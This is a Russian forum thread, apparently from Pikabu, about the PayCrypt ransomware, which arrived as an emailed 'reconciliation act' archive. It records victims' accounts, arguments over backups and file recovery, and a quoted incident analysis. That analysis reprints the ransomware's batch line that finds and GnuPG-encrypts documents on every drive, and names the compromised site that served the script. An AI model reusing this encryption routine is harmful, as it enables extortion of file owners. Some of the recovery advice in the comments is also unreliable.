3031

Зашифровали файлы. Мошенничество.

Сегодня с почты одного из партнёров по работе пришло письмо
"Высылаем Вам акт сверки, просьба подписать и вернуть обратно"
Во вложении архивный файл.
Открыл, и через 30 минут на компе ни одного файла не осталось, все зашифрованные(((
Списался с этими пидорами, просят 600 евро за восстановление 15000 файлов.
Касперский молчал...

Интернет прошерстил, на форуме касперского и доктора web написали -без вариантов!
Или формат всех дисков с полным удалением ВСЕХ файлов (вся база, вся переписка, база 1С, все фотографии за 7 крайних лет)
Или платите деньги!
Адрес с которого пишут Вам мошенники может быть любым, масса способов написать Вам письмо "с почты знакомого Вам человека"
а сам потом они выходят на связь с почты PayCrypt Seller
Будьте аккуратны!!!
П.С. Если Вы мошшеники это читаете - желаю Вам ведро соуса Табаско в ваши пидарские жопы!
Вы смотрите срез комментариев. Показать все
Автор поста оценил этот комментарий
Можно попробовать наш ключ, но сомневаюсь, что поможет. Пришлите зараженный файл. а еще unlock тоже пришлите
раскрыть ветку (81)
Автор поста оценил этот комментарий
Пишут что чужие ключи вообще все файлы гробят(((
раскрыть ветку (78)
Автор поста оценил этот комментарий
такие важные данные и без бэкапа... хм, а ты в курсе, что жесткие диски бывает сами ложатся, без всяких кибертеррористов?
раскрыть ветку (5)
Автор поста оценил этот комментарий
Бэкапы - для трусов!
Только одна (рабочая) копия данных, только хардкор.
раскрыть ветку (4)
Автор поста оценил этот комментарий
безумству храбрых поем мы песню!
раскрыть ветку (2)
Автор поста оценил этот комментарий
Иллюстрация к комментарию
раскрыть ветку (1)
Автор поста оценил этот комментарий
Иллюстрация к комментарию
Автор поста оценил этот комментарий
Есть два типа людей: те, кто делают бэкапы, и те, кто пока их не делает)
Автор поста оценил этот комментарий
Так вы мне один киньте, я у себя на виртуалке попробую) Если получится отправлю вам расшифрованный бесплатно)) с чем черт не шутит. только программу для дешифровки тоже киньте, не осталось сего добра
раскрыть ветку (9)
Автор поста оценил этот комментарий
ок что и куда выслать?
раскрыть ветку (8)
Автор поста оценил этот комментарий
У отца похожее было. Тоже архив с последующей блокировкой компов. Половину востановили половину потеряли.
раскрыть ветку (7)
Автор поста оценил этот комментарий
А нельзя ли потом восстановить файлы через программу восстановления удаленных файлов? (нубка, но помочь попытаюсь)
раскрыть ветку (6)
Автор поста оценил этот комментарий
Нет. Файлы скорее всего изменяются (то есть перезаписываются), восстановить их не получится.
раскрыть ветку (5)
Автор поста оценил этот комментарий
странно, когда нужно восстановит файлы - это сделать нельзя, зато, когда секретные файлы нужно безвозвратно удалить то единственный надёжный способ - физически уничтожить жёсткий диск, и то якобы по осколкам что-нибудь можно восстановить. Почему так?
раскрыть ветку (4)
Автор поста оценил этот комментарий
Обычно уничтожение физически просто быстрее. Иногда, если диск физически неисправен, уничтожить данные на нем программно нельзя.
А вообще мне тоже интересно, неужели можно данные восстановить, если ячейка заряжена не так как раньше.
Надо будет попробовать забить диск 0, а потом посмотреть, удастся ли что-нибудь найти хотя бы распространенными утилитами.
раскрыть ветку (3)
Автор поста оценил этот комментарий
Один файл, как правило, содержит в себе уйму кластеров, которые физически могут быть раскиданы по всему диску. При программном стирании происходит нулевая перезапись только тех кластеров, на которые указывает файловая система, но не тех, которые, возможно, "зависли" на жёстком диске без всяких ссылок после очередного изменения \ модификации файла, процедуры дефрагментации диска, по которым, при удачном стечении обстоятельств, и можно восстановить даже, казалось бы, надёжно удалённый файл. По-крайней мере, его старую модификацию. Пусть даже не полностью, а частично. Такое, конечно, маловероятно, но всё же возможно.
Вот поэтому, чтобы надёжно уничтожить какие-либо данные, и требуется либо полное форматирование физического носителя, либо размагничивание, либо физическое уничтожение. Понятно, что последнее и быстрей и максимально надёжно.
раскрыть ветку (2)
Автор поста оценил этот комментарий
Я о том написал. Если файл был изменен, содержимое этих участков перезаписано, как восстановить то, что было раньше? Это ведь миф про остаточную намагниченность, разве нет?
Я могу взять Partition Wizard, забить диск 0, а потом 1. И все.

Или если файл был изменен без изменения размера. Скорее всего ФС не будет перемещать ячейки - это увеличит время операции и в этом нет смысла. Нельзя восстановить предыдущую версию файла.
раскрыть ветку (1)
Автор поста оценил этот комментарий
с одного из форумов:
У нас заразился только один компьютер (увы, главбуха, где была вся важная инфа).
Жалко что лечения пока нету. И платить не хочется...

Частично решили проблему откатом системы на 2 дня, до точки заражения.
Win7, восстановление предыдущих версий файлов чтобы не е**ться с дешифровкой.


Оплата вымогателям, оказывается, через биткоины - концов не найдешь.


Делюсь своим печальным опытом борьбы с этой заразой.
По сценарию: Письмо, надо заметить, от доверенного респондента, с темой "Акт сверки".
Обычный пользователь, среднестатистический я бы даже сказал, не в жизть не посмотрит, что там за расширение у присланного файла. В моем случае архив, в архиве скрипт. В результате утренний звонок с работы - АВРАЛ!!!
В общем день и ночь работы этой хрени(paycrypt@gmail_com), стоила конторе потери более 200 тыс всяких разных офисных и архивных файлов.
Заспанным глазом взглянув на файлы, опознался пользователь, с компа которого было произведено это варварство. После чего была дана команда комп от сети отрубить. Часть пропажи восстановлена из архива, но кой чего в архивах не было, и в общем-то, надо признать, дофига чего еще не было. Почитав соответствующие форумы вырисовалась печальная картина: придется платить sad.gif Вступили в неспешную переписку с афтором(ами), хрен их знает, может я вообще с ботом переписывался smile.gif, параллельно пытаясь восстановить потерянное всякими R-Studi'ями и GoDataBack'ами. Ответили довольно быстро, уточняли точное количество файлов,
QUOTE
стоимость дешифровки составляет 150 евро до 4000 файлов.
Все что более считайте по коэф. 0.037 евро за 1 файл.
Если брать дешифратор по количеству, будет стоять жесткое ограничение
на кол-во дешифрованых файлов. Дешифратор запускается один раз с
обращением на внешний сервер.
Астрономичность суммы в моем случае зашкаливала, но лиха беда начало.
Решил разобрать все таки что это за хрень. Комп , слава богу был выключен до завершения процесса окончательного превращения нашей скромной конторы в ничто, а стало быть таинство вышеозначенного превращения должно было оставить некие следы, кои и были найдены.
Шифруется все это дело с помощью опенсорс программулины GnuPG, скрипт с взломанного сайта, кстати http://www.russmebelspb.com/, загружает несколько файлов, а именно:
1После чего cmd файл и запускается. Вкратце: генерится ключ, после чего сканируются диски на предмет наличия файлов (xls *.xlsx *.doc *.docx *.pdf *.jpg *.cd *.jpeg *.1cd *.rar *.mdb *.zip). Диски сканируются все, просто перебором английского алфавита. вывод сканирования идет в файл
CODE
if exist C:\*.* for /r "C:\" %%i IN (*.xls *.xlsx *.doc *.docx *.pdf *.jpg *.cd *.jpeg *.1cd *.rar *.mdb *.zip) do (echo %WIND% -r paycrypt --yes --trust-model always --no-verbose -q --encrypt-files "%%i" ^& move /y "%%i.gpg" "%%i" ^& RENAME "%%~fi" "%%~ni%%~xi.%PYCONNECT%@gmail_com">> "%TEMP%\cptbase.bin")
что на выходе дает команду
CODE
svchost.exe -r paycrypt --yes --trust-model always --no-verbose -q --encrypt-files "C:\Users\Username\Desktop\23 февраля Эдельвейс\Документ Microsoft Word.docx" & move /y "C:\Users\Username\Desktop\23 февраля Эдельвейс\Документ Microsoft Word.docx.gpg" "C:\Users\FUsername\Desktop\23 февраля Эдельвейс\Документ Microsoft Word.docx" & RENAME "C:\Users\Username\Desktop\23 февраля Эдельвейс\Документ Microsoft Word.docx" "Документ Microsoft Word.docx.paycrypt@gmail_com"
Опосля чего все исходники самоудаляются, оставив на память о себе только письмо счастья, файл PRIVATE.KEY и DECODE.ZIP (архив с дешифровщиком[внутри самораспаковывающийся архив с cmd-файлом обратного назначения]).
Отчаяный шаг установки виндоверсии GnuPG (pgp4win - если кому интересно) показал наличие открытого ключа, того самого PRIVATE.KEY, попытки использовать программы восстановления данных для возврата закрытого ключа, тоже успехом не увенчались. Видимо сказывается специфика работы командного файла, ибо операций записи, после удаления файла происходило до черта.
Выводы на это время: - ключ у злоумышленника есть (отосланные ему зашифрованные файлы были возвернуты в читабельном состоянии), ключ не зависит, от количества файлов зашифрованных эти колючем. Так что ....Все что более считайте по коэф. 0.037 евро за 1 файл - это очередной развод.
Решились обходится малой кровью - заплатили оговоренные 150 евро. Ключ был прислан к вечеру, запущен дешифратор на виртуалке со скопированными файлами и ...... барабанная дробь....ПШШШИК!!!!
Ни-хе-ра.
Файлы переименовались в gpg - родное расширение для GnuPG, и все.
Дальше началась типичная переписка с техподдержкой. Однако, техподдержка у вируса.... маразм какой то. smile.gif
На все наши уверения, что ключ кривой, что видно если из коммандной строки запустить тот самый дешифратор
CODE
decrypt.exe --import "UNCRYPT.KEY"
gpg: keyring `C:/Documents and Settings/Lфьшэ/Application Data/gnupg\secring.gpg' created
gpg: keyring `C:/Documents and Settings/Lфьшэ/Application Data/gnupg\pubring.gpg' created
gpg: key IDKEY008: secret key imported

echo paycrypt | decrypt.exe --batch --passphrase-fd 0 --no-verbose --decrypt-files "C:\Documents and Settings\Username\Мои документы\Microsoft Word.docx.gpg"
>gpg: encrypted with RSA key, ID IDKEY004
>gpg: decryption failed: secret key not available

ID ключа я здесь не привожу, но не тот это был ключ которым шифровали мои документы... там даже дата создания ключа была месяцем раньше, чем дата заражения
В общем неделя ушла на убеждения, что с ключом ошибка вышла. Чувак упорно не слушал доводов о левизне ключа и присылал какие-то новые версии дешифраторов. Взывания к совести тут были бы бесполезны но решили ударить по-больному, т.е. опозорить "ЧЕСТНОЕ ИМЯ", мол на антивирусных форумах пропишем, что ты кидала, деньги берешь, а результата - ноль. Сей ж момент был прислан другой ключ.
Дешифратор использовал gpg4win, как то больше к нему доверия. Файлы восстановились.

Резюме:
На данный момент сайт http://www.russmebelspb.com/ блокируется почти всеми антивирусами, но я не думаю, что это последний взломанный сайт в этом мире.
Антивирус подобную заразу не поймает, в коде нет ничего криминального с точки зрения системы защиты.
Злоумышленник, в общем-то , в меру честен, окромя случая развода на бабло исходя из количества файлов (берем с него пример, не признавайтесь что стопицот файлов похерено)
Если комп выключить очень быстро...ну очень-очень быстро, а не как в моем случае - сутки спустя, то можно даже поймать неотправленный ключ.
Ну и ...есть админы, которые уже делают бэкапы, а есть, которые еще не делают, меня перевели в другую категорию, правда не бесплатно.

P.S. у меня есть чей то чужой ключ - может кому пригодится.

This post has been edited by imalazyman: 15.07.2014 23:58
раскрыть ветку (6)
DELETED
Автор поста оценил этот комментарий
чужой ключ, увы и ах - никому не нужен
Автор поста оценил этот комментарий
так почему нельзя восстановить удалённые исходные файлы?

Просто в каком-то посте про уничтожение файлов было написано, что файлы могут быть восстановлены даже после многократного переписывания данных на жёстком диске, поэтому во всяких секретных конторах жесткие диски с секретными данными просто физически уничтожаются
раскрыть ветку (4)
Автор поста оценил этот комментарий
даже если и возможно, то стоимость данного восстановления будет выше стоимости информации. И советую вообще забыть про данную возможность. http://www.mhdd.ru/faq.html#f11
Автор поста оценил этот комментарий
на диске они могут быть перезаписаны сверху другими файлами или вообще нулевыми байтами и усё пешы пропало)
раскрыть ветку (2)
Автор поста оценил этот комментарий
опять в том же посте было, что даже после нескольких перезаписываний шпиёны смогут восстановить данные, поэтому во избежание промышленного шпионажа винчестеры с важными данными уничтожают
раскрыть ветку (1)
Автор поста оценил этот комментарий
3х кратная перезапись диска нулевыми байтами и восстанавливать будет уже нечего.
Автор поста оценил этот комментарий
На любой обменник. зашифрованный файл и unlock.exe или типо того
раскрыть ветку (21)
Автор поста оценил этот комментарий
вообще шифруется gnupg
раскрыть ветку (2)
Автор поста оценил этот комментарий
С чего вы взяли? Не обязательно, да и без разницы это.
раскрыть ветку (1)
Автор поста оценил этот комментарий
Именно этот шифровальщик шифрует им
Автор поста оценил этот комментарий
1.http://ргхост ru/57549388 зашифрованный файл
2.дешифровщика нет никакого или не нашел
3.http://ргхост ru/57549406 инструкция этих мудаков
раскрыть ветку (17)
Автор поста оценил этот комментарий
ща попробую
раскрыть ветку (15)
Автор поста оценил этот комментарий
отпишитесь чтоль..... неделю уже моя контора без сети ) все что было заблочено так, просят 10к
раскрыть ветку (14)
Автор поста оценил этот комментарий
ок. уже пробую
раскрыть ветку (3)
Автор поста оценил этот комментарий
Если будет решение, то я, пожалуй, тоже возьму)
раскрыть ветку (2)
Автор поста оценил этот комментарий
Вообще рекомендую виртуальный сервер на рейде, с реализацией суточных снапшотов на будущее.
раскрыть ветку (1)
Автор поста оценил этот комментарий
Мне такое не надо. Чужой ПК. Зашифрованы не очень важные файлы. Фотки, музыка, видео и тд. А у самого все важные файлы (фотки) на внешнем диске хранятся)
Автор поста оценил этот комментарий
вообщем грусть, печаль. он просто поменял расширение на GPG
раскрыть ветку (9)
Автор поста оценил этот комментарий
XD
Автор поста оценил этот комментарий
Не зашифрованы?
Автор поста оценил этот комментарий
Что это значит?
раскрыть ветку (6)
Автор поста оценил этот комментарий
Не подошел ключ((
раскрыть ветку (5)
DELETED
Автор поста оценил этот комментарий
ключи индивидуальны для каждого компа
Автор поста оценил этот комментарий
И что, можно что-либо сделать?
раскрыть ветку (3)
Автор поста оценил этот комментарий
Можно попробовать снизить цену, либо немного схитрить )
раскрыть ветку (2)
Автор поста оценил этот комментарий
там ворд документ
должны еще экзешники быть
Автор поста оценил этот комментарий
Поэтому я на маке
раскрыть ветку (7)
Автор поста оценил этот комментарий
А еще time machine. Супер штука. Ну а вообще бэкап - наше все. Кто его не делает, сам виноват.
раскрыть ветку (3)
Автор поста оценил этот комментарий
Тоже тайм машин всегда пользуюсь!
раскрыть ветку (2)
Автор поста оценил этот комментарий
Я бы тоже был не против машины времени. Вернулся в прошлое - и не стал открывать письмо
раскрыть ветку (1)
Автор поста оценил этот комментарий
шутку про машину времени я понял, с этим не помогу, а вот тайм-машин в интернете уже хватает)
Автор поста оценил этот комментарий
если все станут сидят на маках, то и вирусы начнут писать для маков
раскрыть ветку (2)
Автор поста оценил этот комментарий
вывод пусть все сидят на винде, а по теме давно бы писали вирусы под мак но не все так просто
раскрыть ветку (1)
Автор поста оценил этот комментарий
Вирусы под OS Х есть, просто меньше, ведь маки составляют только 6% всех ПК
http://appleinsider.ru/eto-interesno/kratkaya-istoriya-virus...
Автор поста оценил этот комментарий
Шифровальщики создают новые зашифрованные файлы. Старые файлы просто удаляются. При помощи програмулек типа GetData Recover My Files всё прекрасно восстанавливается ;)
раскрыть ветку (8)
Автор поста оценил этот комментарий
дак проще форматнуть все ,а потом через востанавливающие проги пытаться востановить файлы))
раскрыть ветку (7)
Автор поста оценил этот комментарий
И смысл? Ты этой процедурой восстановишь то, что было в момент форматирования, т.е. зашифрованные файлы
раскрыть ветку (6)
Автор поста оценил этот комментарий
смысл есть так как могут востановится и не зашифрованные файлы,ты же не пробывал поэтому не знаешь точно?))
раскрыть ветку (5)
Автор поста оценил этот комментарий
Ты, наверное, холодильник дома несколько раз открываешь и закрываешь, вдруг его содержимое изменится, никто ведь не знает
раскрыть ветку (4)
Автор поста оценил этот комментарий
не сравнивай жопу с пальцем))ты даже не пробывал это сделать а пяткой в грудь бьешь что это типа не возможно!
раскрыть ветку (3)
Автор поста оценил этот комментарий
Вирус удаляет все файлы компа, перезаписывает их в другой формат и создает новые. Форматнув жд, ты удалишь новые файлы и при восстановлении востановятся именно они, новые файлы. Если у тебя из кармана достанут 100 рублей, сожгут их, и положат обратно 50, ты, вытряхнув содержимое карманов и положив все назад, не найдешь 100 рублей, а только 50.
раскрыть ветку (2)
Автор поста оценил этот комментарий
бляяя ну ты гонишь востанавливаются вообщето все файлы даже удаленные ранее тех файлов который зашифрованные!!!я уже столько раз востанавливал данные что точно знаю что востановить можно даже те которые были удаленны очень давно
раскрыть ветку (1)
Автор поста оценил этот комментарий
Восстановление файлов возможно в том случае, если по верх них не было записано других на то же место. Если у тебя был полностью забитый жёсткий диск на 300 гб, ты его форматнул и записал поверх 250 гб, то ты восстановишь 250 гб новых файлов и 50 гб старых, но это при условии, если ты делал регулярную дефрагментацию жёсткого диска, когда на нём было 300 гб старых файлов. Если же нет, то скорее всего в этих 50 гб будут нечитаемые куски старых файлов.
Автор поста оценил этот комментарий
но однозначно пока что только платить, ибо лекарств пока нет.
ещё комментарии
Автор поста оценил этот комментарий
Храните, люди, 1ску в облаке) будете здоровы)
Автор поста оценил этот комментарий
еще пин пришлите и номер карточки
Вы смотрите срез комментариев. Чтобы написать комментарий, перейдите к общему списку